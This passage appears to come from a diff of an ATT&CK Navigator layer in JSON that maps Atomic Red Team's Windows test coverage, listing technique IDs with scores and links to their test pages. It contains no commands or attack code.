iqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546
.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1
547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/
master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/
blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-
team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic
-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-te
am/blob/master/atomics/T1574.012/T1574.012.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https
://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003
/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}
,{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004"
,"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score
":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"
T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T10
74","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","sc
ore":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/